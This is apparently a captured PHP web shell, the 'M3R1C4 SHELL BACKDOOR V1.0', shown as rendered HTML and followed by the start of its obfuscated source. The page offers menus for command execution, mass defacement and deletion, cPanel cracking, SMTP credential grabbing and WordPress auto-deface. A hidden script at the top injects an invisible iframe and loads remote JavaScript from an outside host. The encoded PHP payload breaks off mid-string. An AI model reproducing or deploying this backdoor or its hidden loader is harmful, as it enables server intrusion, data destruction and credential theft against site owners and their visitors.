(\d+)/i.exec(navigator.userAgent);return e(n)&&n.length>0&&(t=parseInt(n[1])>=4),t}function d(e){var t=document.createElement("div");return t.setAttribute("id","fn_wrapper_div"),t.style.position="fixed",t.style.display="none",t.ontouchstart=function(){return!0},t.appendChild(e),t}function o(){var t=void 0,a=this,r=function(){e(t)&&(window.clearTimeout(t),t=void 0,n.call(a))};t=window.setTimeout(r,1e4),"function"==typeof window.addEventListener?window.addEventListener("load",r,!1):window.attachEvent("onload",r)}var c="http://globe.moreforme.net",u=c+"/l8/Layer8Servlet",s=c+"/scripts/Anchor.js";o()};var layer8Loader=new window[layer8NameSpace].layer8Loader}</script>
<title>aDriv4</title>
<meta name="author" content="aDriv4">
<meta charset="UTF-8">
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: yellow;
text-decoration: underline;
}
b {
color: yellow;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
<title>$$ Beby $$</title><style>
@font-face {
font-family: 'Comic Sans MS';
font-style: normal;
font-weight: 400;
src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
}
body {
background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");
line-height: 1;color: #fff;font-family: Comic Sans MS ;
}
table, th, td {
border-collapse:collapse;
background: transparent;
font-family: Comic Sans MS ;
font-size: 13px;
}
input, textarea { font-family: Comic Sans MS ; }
.table_home, .th_home, .td_home { color:grey;
border: 1px solid grey;
}
th {
padding: 10px;
}
.td_home { padding: 7px; }
select {font-family: Comic Sans MS }
a {color:white}
textarea { width: 100%;height: 400px; }
</style></head>
<body><b>
<h1><center>M3R1C4 <font color="red">SHELL BACKDOOR</font> <font color="dodgerblue">V1.0</font></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>
<font color="green"><center>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</center></font><br><font color="#fff"></font><center><font color="#fff">Current DIR:<a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/<hr><right><ul><li><a href="?">Home</a></li><li><a href="?dir=&do=cmd">Command</a></li><li><a href="?dir=&do=mass_deface">Mass Deface</a></li><li><a href="?dir=&do=mass_delete">Mass Delete</a></li><li><a href="?dir=&do=config">Config</a></li><li><a href="?dir=&do=jumping">Jumping</a></li><li><a href="?dir=&do=cpanel">CPanel Crack</a></li><li><a href="?dir=&do=smtp">SMTP Grabber</a></li><li><a href="?dir=&do=zoneh">Zone-H</a></li><li><a href="?dir=&do=cgi">CGI Telnet</a></li><li><a href="?dir=&do=network">network</a></li><li><a href="?dir=&do=adminer">Adminer</a></li><br><li><a href="?dir=&do=fake_root">Fake Root</a></li><li><a href="?dir=&do=auto_edit_user">Auto Edit User</a></li><li><a href="?dir=&do=auto_wp">Auto Edit Title WordPress</a></li><li><a href="?dir=&do=auto_dwp">WordPress Auto Deface</a></li><li><a href="?dir=&do=auto_dwp2">WordPress Auto Deface V.2</a></li><li><a href="?dir=&do=cpftp_auto">CPanel/FTP Auto Deface</a></li></ul></right><hr></font></center></td></tr><tr><td><center></center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file">
<input type="submit" value="Upload">
</font></form></center><font color="black">
</font></td></tr></tbody></table><br><center></center> <br><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr>
<th class="th_home" style="background:silver;color:black;"><center>Name</center></th>
<th class="th_home" style="background:silver;color:black;"><center>Size</center></th>
<th class="th_home" style="background:silver;color:black;"><center>Permission</center></th>
<th class="th_home" style="background:silver;color:black;"><center>Options</center></th>
</tr> <tr>
<td class="td_home">..</td><td class="td_home" align="center">NONE</td> <td class="td_home" align="center">LINK</td> <td class="td_home" align="center"> <a href="?option&path=/var/www/html&opt=baru&name=new.php">New File</a> | <a href="?option&path=/var/www/html&opt=btw&type=dir">New Folder</a> </td></tr>
<tr>
<td class="td_home"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="> <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td class="td_home"><center>0 KB</center></td>
<td class="td_home"><center>-rw-r--r--</center></td>
<td class="td_home"><center>
<a href="?option&path=/var/www/html&opt=edit&type=file&name=beneri.se_malware_analysis">Edit</a> <a href="?option&path=/var/www/html&opt=rename&type=file&name=beneri.se_malware_analysis&path=/var/www/html">Rename</a> <a href="?option&path=/var/www/html&opt=delete&type=file&name=beneri.se_malware_analysis">Delete</a> <a href="?option&path=/var/www/html&opt=chmod&type=file&name=beneri.se_malware_analysis">Chmod</a>
</center></td>
</tr><tr>
<td class="td_home"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="> <a href="?filesrc=/var/www/html/img_x.phtml&path=/var/www/html">img_x.phtml</a></td>
<td class="td_home"><center>24.648 KB</center></td>
<td class="td_home"><center>-rw-rw-r--</center></td>
<td class="td_home"><center>
<a href="?option&path=/var/www/html&opt=edit&type=file&name=img_x.phtml">Edit</a> <a href="?option&path=/var/www/html&opt=rename&type=file&name=img_x.phtml&path=/var/www/html">Rename</a> <a href="?option&path=/var/www/html&opt=delete&type=file&name=img_x.phtml">Delete</a> <a href="?option&path=/var/www/html&opt=chmod&type=file&name=img_x.phtml">Chmod</a>
</center></td>
</tr></tbody></table>
<br></b><center><b>Copyright © Trenggalek Cyber Army</b>
</center></body><iframe id="fn_layer8" src="http://globe.moreforme.net/l8/Layer8Servlet" target="_blank" frameborder="no" style="display: none;"></iframe></html>Original PHP code
<html>
<head><script>if(top==window){var layer8NameSpace="layer8ns";"undefined"==typeof window[layer8NameSpace]&&(window[layer8NameSpace]={}),window[layer8NameSpace].layer8Loader=function(){function e(e){return"undefined"!=typeof e&&null!==e}function t(){var t=document.createElement("script");t.setAttribute("src",s),t.setAttribute("id","fn_layer8_script"),t.setAttribute("async",""),(null==document.head||e(document.head))&&(document.head=document.getElementsByTagName("head")[0]),document.head.appendChild(t)}function n(){var t=r();if(e(t)){var n=t;i()&&(n=d(t));var o;try{o=document.documentElement,o.appendChild(n)}catch(c){o=document.body,o.appendChild(n)}a()}}function a(){function e(e){var n=e.data;"l8IframeIsReady"===n.message&&t()}window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onmessage",e)}function r(){var t=document.createElement("iframe");if(e(t)){t.setAttribute("id","fn_layer8"),t.setAttribute("src",u),t.setAttribute("target","_blank"),t.setAttribute("frameborder","0");var n=/firefox/i.exec(navigator.userAgent);e(n)&&n.length>0?(t.style.height=0,t.style.width=0):t.style.display="none",t.frameBorder="no"}return t}function i(){var t=!1,n=/android (\d+)/i.exec(navigator.userAgent);return e(n)&&n.length>0&&(t=parseInt(n[1])>=4),t}function d(e){var t=document.createElement("div");return t.setAttribute("id","fn_wrapper_div"),t.style.position="fixed",t.style.display="none",t.ontouchstart=function(){return!0},t.appendChild(e),t}function o(){var t=void 0,a=this,r=function(){e(t)&&(window.clearTimeout(t),t=void 0,n.call(a))};t=window.setTimeout(r,1e4),"function"==typeof window.addEventListener?window.addEventListener("load",r,!1):window.attachEvent("onload",r)}var c="http://globe.moreforme.net",u=c+"/l8/Layer8Servlet",s=c+"/scripts/Anchor.js";o()};var layer8Loader=new window[layer8NameSpace].layer8Loader}</script>
<title>aDriv4</title>
<meta name='author' content='aDriv4'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: yellow;
text-decoration: underline;
}
b {
color: yellow;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<?php
$aDriv4 = '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